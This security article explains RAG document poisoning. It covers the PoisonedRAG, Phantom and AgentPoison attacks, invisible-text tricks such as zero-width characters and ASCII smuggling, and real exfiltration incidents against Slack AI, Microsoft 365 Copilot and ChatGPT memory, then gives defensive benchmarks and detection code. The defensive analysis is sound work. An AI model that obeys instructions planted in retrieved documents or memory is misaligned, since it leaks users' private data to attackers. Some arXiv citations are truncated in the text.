Document Poisoning: How Attackers Are Corrupting Your AI's Knowledge Base

RAG (Retrieval-Augmented Generation) document poisoning lets attackers corrupt what your AI believes by injecting false or malicious content into its knowledge base. Unlike model-level attacks, a single poisoned document fires on every relevant query, from every user, indefinitely—without any modification to the underlying model.

What Is RAG Document Poisoning?

Most enterprise AI systems deployed today don’t rely solely on a model’s training data. Instead, they use Retrieval-Augmented Generation: when a user asks a question, the system searches an external document store—a vector database like Pinecone, ChromaDB, or Weaviate—fetches the most relevant chunks, and feeds them to the LLM as context before generating an answer.

This architecture solves a real problem. It keeps AI responses current without expensive retraining, grounds answers in company-specific data, and reduces hallucination. More than 30% of enterprise AI applications now use RAG as of 2025, according to industry estimates.

The architecture also introduces a critical trust assumption: retrieved documents are implicitly treated as authoritative context. User queries get validated, sanitized, and rate-limited. Retrieved documents typically do not. Both ultimately enter the same LLM prompt—but only one is treated with suspicion.

Document poisoning exploits this gap.

How the Attack Works

The canonical attack, formalized in the PoisonedRAG paper published by researchers at Penn State and the Illinois Institute of Technology (arXiv

.07867, accepted USENIX Security 2025), requires two conditions:

The poisoned document achieves higher cosine similarity to target queries than legitimate sources.
The retrieved content causes the LLM to produce the attacker’s desired output.

In practice, this is easier than it sounds. The researchers demonstrated that injecting just five malicious documents into a knowledge base containing millions achieves over 90% attack success rate. In black-box experiments against PaLM 2, results reached 97% on the Natural Questions benchmark, 99% on HotpotQA, and 91% on MS-MARCO.¹

Researcher Amine Raji, PhD, reproduced similar results on a local consumer hardware setup—Qwen2.5-7B-Instruct with ChromaDB—measuring a 95% success rate for knowledge base poisoning on an undefended stack. No cloud infrastructure required.²

The structural insight is precise: an attacker doesn’t need to compromise the LLM, the application, or the users. They only need to get a document into the knowledge base. From there, the retrieval system does the rest.

A Taxonomy of RAG Attacks

Research since 2024 has produced a rich taxonomy of distinct attack variants, each with different entry points and objectives.

Attack Type	Entry Point	Success Rate	Venue
Corpus Poisoning (PoisonedRAG)	Knowledge base write access	90–99%	USENIX Security 2025
Trigger Backdoor (Phantom)	Single injected document	~90%	arXiv 2024
Agent Memory Poisoning (AgentPoison)	Agent episodic/procedural memory	≥80%	NeurIPS 2024
Query-Targeted Denial of Service	Single blocker document	High	USENIX Security 2025
Cross-Tenant Data Leakage	Standard query	100%	Amine Raji Labs
Multimodal Poisoning (PoisonedEye)	Single image-text pair	High	ICML 2025
Memory Persistence (SpAIware)	Document or website	Ongoing	ScienceDirect 2025

Trigger-Based Backdoors: The Phantom Attack

Phantom (arXiv

.20485, Harsh Chaudhari et al.) injects a single document that remains completely dormant during normal queries. It only activates when a specific trigger token sequence appears in the user’s query. The document is optimized in two stages: first to ensure retrieval only when the trigger fires, then to induce specific LLM behaviors—refusal, harmful content, reputation damage, or privacy violations.³

Phantom demonstrated 90% attack success rate across popular RAG systems including Gemma, Vicuna, and Llama, with confirmed transfer to GPT-3.5 Turbo and GPT-4. It was also successfully executed against NVIDIA’s production “Chat with RTX” system in black-box conditions.

Agent Memory Poisoning: AgentPoison

AgentPoison (arXiv

.12784, NeurIPS 2024) targets AI agents that use RAG for episodic or procedural memory—a growing architecture where agents “remember” past interactions by storing and retrieving from a knowledge base.⁴

The attack poisons the agent’s long-term memory with a small number of malicious demonstrations containing an optimized trigger. Results: ≥80% attack success rate with less than 0.1% poison rate—meaning the attacker needs to inject fewer than one document per thousand to control agent behavior. Demonstrated on three real-world agent types: autonomous driving, knowledge-intensive QA, and the healthcare EHRAgent.

Invisible Content Injection

Documents can contain instructions invisible to human reviewers but fully parsed by LLMs:

White text on white background
Font size zero text
Zero-width Unicode characters (U+200B, U+200C)
Bidirectional text reordering
ASCII smuggling: encoding instructions in Unicode lookalike characters

The ACM AISec Workshop 2024 paper “The Hidden Threat in Plain Text: Attacking RAG Data Loaders” specifically covers attacks via document parsing pipelines, where these techniques defeat visual review entirely.⁵

Cross-Tenant Data Leakage

In multi-tenant enterprise deployments—shared RAG infrastructure where multiple departments or customers share the same vector database—if access control is enforced at the application layer but not at the retrieval layer, any user can submit a query semantically similar to another tenant’s documents and retrieve them.

Amine Raji measured cross-tenant leakage at 100% success rate across 20 test queries, with zero technical sophistication required. A legitimate user asking a relevant business question is sufficient.²

Real-World Incidents

The theoretical attack surface became concrete in 2024, with multiple production systems affected.

Slack AI Data Exfiltration (August 2024)

Discovered by PromptArmor and documented by security researcher Simon Willison, the Slack AI attack demonstrated the full RAG poisoning chain in a widely deployed system. Slack AI uses RAG-style retrieval over public channels, private channels, and uploaded files.

An attacker posting poisoned tokens in a public Slack channel could cause Slack AI to render a crafted Markdown image link when a legitimate user queried the AI. The image URL contained exfiltrated private data in its query string, transmitting it to the attacker’s server. A Slack update on August 14, 2024 expanding Slack AI to include DM files widened the attack surface.⁶

Microsoft 365 Copilot ASCII Smuggling (2024)

Security researcher Johann Rehberger demonstrated a combined attack against Microsoft 365 Copilot: RAG poisoning via malicious emails or documents, combined with automatic tool invocation and ASCII smuggling (Unicode lookalike characters to render invisible data), with hyperlink manipulation for exfiltration.⁷

The attack was disclosed to Microsoft in January 2024 and presented publicly at HITCON CMT in August 2024. Zenity CTO Michael Bargury and AI security engineer Tamir Ishay Sharbat demonstrated a related variant, “Living off Microsoft Copilot,” at Black Hat USA 2024. A related zero-click variant, CVE-2025-32711 (“EchoLeak”), was disclosed in 2025 after Microsoft patched the original ASCII smuggling flaw.

SpAIware: ChatGPT Persistent Memory Poisoning (September 2024)

Johann Rehberger demonstrated that a malicious website or document analyzed via ChatGPT could inject persistent instructions into ChatGPT’s long-term memory. Because memory persists across all future sessions in a RAG-style architecture, every subsequent conversation included the attacker’s instructions, enabling ongoing data exfiltration.⁸

OpenAI patched this in ChatGPT version 1.2024.247. A peer-reviewed paper, “SpAIware: Uncovering a novel artificial intelligence attack vector through persistent memory in LLM applications and agents,” was subsequently published in ScienceDirect (2025).

The AI Supply Chain Parallel

Security Magazine framed RAG poisoning explicitly as “the new software supply chain attack”—and the structural parallel is exact.⁹

In software supply chains, attackers compromise a dependency that gets included in many downstream builds. In RAG supply chains, attackers compromise a document that gets included in many downstream AI responses. The leverage is similar: one injection point, broad impact, difficult attribution.

RAG supply chain attack vectors include:

Third-party data feeds: Any external dataset—web crawls, RSS feeds, vendor documentation—ingested into a knowledge base is a supply chain input. If it’s not validated at ingest, it’s an unmonitored attack surface.
Shared model repositories: A 2024 investigation by Wiz and Hugging Face identified over 100 malicious models on the Hugging Face Hub capable of injecting malicious code into downstream pipelines.¹⁰
Wikipedia poisoning at scale: Research by Carlini et al. (2024) demonstrated that up to 6.5% of English Wikipedia is modifiable at precisely timed windows before bimonthly data dumps, enabling poisoning of virtually every LLM pre-training and RAG pipeline that includes Wikipedia.
CI/CD pipeline ingestion: Automated document ingestion without human review is an unmonitored ingestion path by definition.

NIST addressed this directly in AI 100-2e2025, which added distinct subsections on data poisoning and model poisoning in the context of supply chain attacks, explicitly recognizing third-party foundation model supply chains as a distinct risk category.¹¹

Defense: What the Research Shows

The most quantitatively rigorous defense benchmarking comes from Amine Raji’s research, testing five layered defenses against a ChromaDB+LLM stack:²

Defense Layer	Poisoning Attack	Injection (markers)	Injection (semantic)	Cross-Tenant
No defense	95%	55%	70%	100%
Ingestion sanitization	95%	0%	70%	—
Access-controlled retrieval	70%	—	—	0%
Prompt hardening	90%	20%	Reduced	—
Output monitoring	60%	10%	Partial	—
Embedding anomaly detection	20%	—	—	—
All five combined	10%	0%	15%	0%

Two findings are especially notable:

Embedding anomaly detection is the single most effective standalone control. Flagging documents with greater than 85% cosine similarity to existing content, or tight clustering among new ingest candidates, reduces poisoning success from 95% to 20%—with no additional models required, operating on embeddings already computed at ingestion.

Semantic injection remains the hardest problem. Even with all five defenses combined, semantic injection—using authoritative natural language with no structural markers—still achieves 15%. This attack type requires ML-based intent classification or human editorial review to close fully.

Additional defenses with measured results:

SecureRAG / Perplexity-Based Filtering (arXiv
.25025): Two-stage filtering combining expanded retrieval scope with chunk-wise perplexity analysis. Poisoned texts often show large perplexity discrepancies between chunks.
RAGuard (NeurIPS 2025): Fine-tunes dense retrievers using synthetic poisoned documents to downrank malicious passages, combined with zero-knowledge inference patching that identifies suspicious documents based on causal influence on QA correctness.
Combined sanitization pipeline: Sanitization + Unicode normalization (targeting zero-width characters) + attribution-gated prompting achieves a macro-average attack success rate of 4.7% on the Hidden-in-Plain-Text benchmark.¹²

A Practical Defensive Checklist

# Example: Embedding anomaly detection at ingest
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

def check_document_anomaly(new_embedding, existing_embeddings, threshold=0.85):
    """
    Flag documents with suspiciously high similarity to existing content.
    High cosine similarity may indicate adversarial crafting for retrieval gaming.
    """
    if len(existing_embeddings) == 0:
        return False, 0.0

    similarities = cosine_similarity([new_embedding], existing_embeddings)[0]
    max_similarity = np.max(similarities)

    if max_similarity > threshold:
        return True, max_similarity
    return False, max_similarity

def check_batch_clustering(batch_embeddings, threshold=0.90):
    """
    Detect tightly clustered ingest batches—a signal of coordinated poisoning.
    """
    if len(batch_embeddings) < 2:
        return False

    sim_matrix = cosine_similarity(batch_embeddings)
    np.fill_diagonal(sim_matrix, 0)
    mean_pairwise = sim_matrix.mean()

    return mean_pairwise > threshold

What Practitioners Need to Do Now

RAG document poisoning is not a future risk. PoisonedRAG is published. AgentPoison is published. Slack AI was attacked in production. Microsoft 365 Copilot was attacked in production. ChatGPT’s long-term memory was attacked in production. NVIDIA’s Chat with RTX was attacked with a trigger-based backdoor.

The attack surface grows with every new data source connected to a RAG pipeline. Vendor documentation, internal wikis, customer support tickets, shared Slack channels, email threads—any content ingested for AI retrieval is a potential injection point.

The research is also clear that no single defense closes the gap. Embedding anomaly detection is the most effective standalone control. Access-controlled retrieval eliminates cross-tenant leakage entirely. Combining five layered defenses reduces the attack surface from 95% to 10%. The 15% residual for semantic injection is the frontier where human review and ML-based intent classification remain the only reliable controls.

For organizations building or operating RAG systems: the document store is now part of your security perimeter. Treat it accordingly.

Frequently Asked Questions

Q: Can RAG poisoning affect systems with read-only document stores? A: Yes. Any path that writes to the knowledge base—including CI/CD pipelines, third-party data feeds, and automated web crawls—is a potential attack vector. Read-only access for end users doesn’t protect against poisoning at the ingestion stage.

Q: Does encrypting the vector database prevent document poisoning? A: No. Encryption protects data at rest from unauthorized external access, but it doesn’t prevent authorized ingestion paths (which are the primary attack vector) from writing malicious content. Defense must occur at the ingestion and retrieval logic layers.

Q: How is document poisoning different from prompt injection? A: Prompt injection manipulates the model through user-supplied input at query time; it affects one query from one user. Document poisoning manipulates the knowledge base at ingest time; it persists indefinitely and affects every user who asks a relevant query, without any ongoing attacker involvement.

Q: Are commercial RAG services (AWS Bedrock, Azure AI Search, Google Vertex) vulnerable? A: The architectural vulnerability is fundamental to how RAG works, not specific to any vendor. Commercial platforms add security controls, but the trust gap between query validation and document trust exists across all implementations unless explicitly addressed. Cross-tenant isolation in shared deployments is a separate, measurable risk.

Q: What’s the minimum viable defense for a small team deploying RAG today? A: Implement access-controlled retrieval (eliminates cross-tenant leakage at 0% residual), enforce ingestion sanitization (eliminates marker-based injection), and add Unicode normalization (counters invisible character attacks). These three controls address the highest-success, lowest-sophistication attacks with minimal infrastructure overhead.

Wei Zou, Runpeng Geng, Binghui Wang, Jinyuan Jia. “PoisonedRAG: Knowledge Corruption Attacks to Retrieval-Augmented Generation of Large Language Models.” arXiv
.07867. USENIX Security 2025. https://arxiv.org/abs/2402.07867 ↩
Amine Raji, PhD. “RAG Security: Knowledge Base Poisoning Succeeds 95% of the Time.” aminrj.com, 2024. https://aminrj.com/posts/rag-security-architecture/ ↩ ↩² ↩³
Harsh Chaudhari et al. “Phantom: General Backdoor Attacks on Retrieval Augmented Language Generation.” arXiv
.20485. 2024. https://arxiv.org/abs/2405.20485 ↩
Zhaorun Chen, Zhen Xiang, Chaowei Xiao, Dawn Song, Bo Li. “AgentPoison: Red-teaming LLM Agents via Poisoning Memory or Knowledge Bases.” NeurIPS 2024. arXiv
.12784. https://arxiv.org/abs/2407.12784 ↩
“The Hidden Threat in Plain Text: Attacking RAG Data Loaders.” ACM AISec Workshop 2024. https://dl.acm.org/doi/10.1145/3733799.3762976 ↩
Simon Willison. “Data exfiltration from Slack AI via indirect prompt injection.” simonwillison.net, August 20, 2024. https://simonwillison.net/2024/Aug/20/data-exfiltration-from-slack-ai/ ↩
Johann Rehberger. “Microsoft 365 Copilot: Prompt Injection, Tool Invocation and Data Exfiltration using ASCII Smuggling.” embracethered.com, 2024. https://embracethered.com/blog/posts/2024/m365-copilot-prompt-injection-tool-invocation-and-data-exfil-using-ascii-smuggling/ ↩
Johann Rehberger. “SpAIware: Uncovering a novel artificial intelligence attack vector through persistent memory in LLM applications and agents.” ScienceDirect, 2025. https://www.sciencedirect.com/science/article/abs/pii/S0167739X25002894 ↩
“Are AI data poisoning attacks the new software supply chain attack?” Security Magazine, 2024. https://www.securitymagazine.com/articles/100590-are-ai-data-poisoning-attacks-the-new-software-supply-chain-attack ↩
Wiz / Hugging Face investigation, 2024. Reported by security researchers on platform model safety. ↩
NIST. “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations.” NIST AI 100-2e2025. https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-2e2025.pdf ↩
“Hidden-in-Plain-Text: A Benchmark for Social-Web Indirect Prompt Injection in RAG Systems.” arXiv
.10923. https://arxiv.org/abs/2601.10923 ↩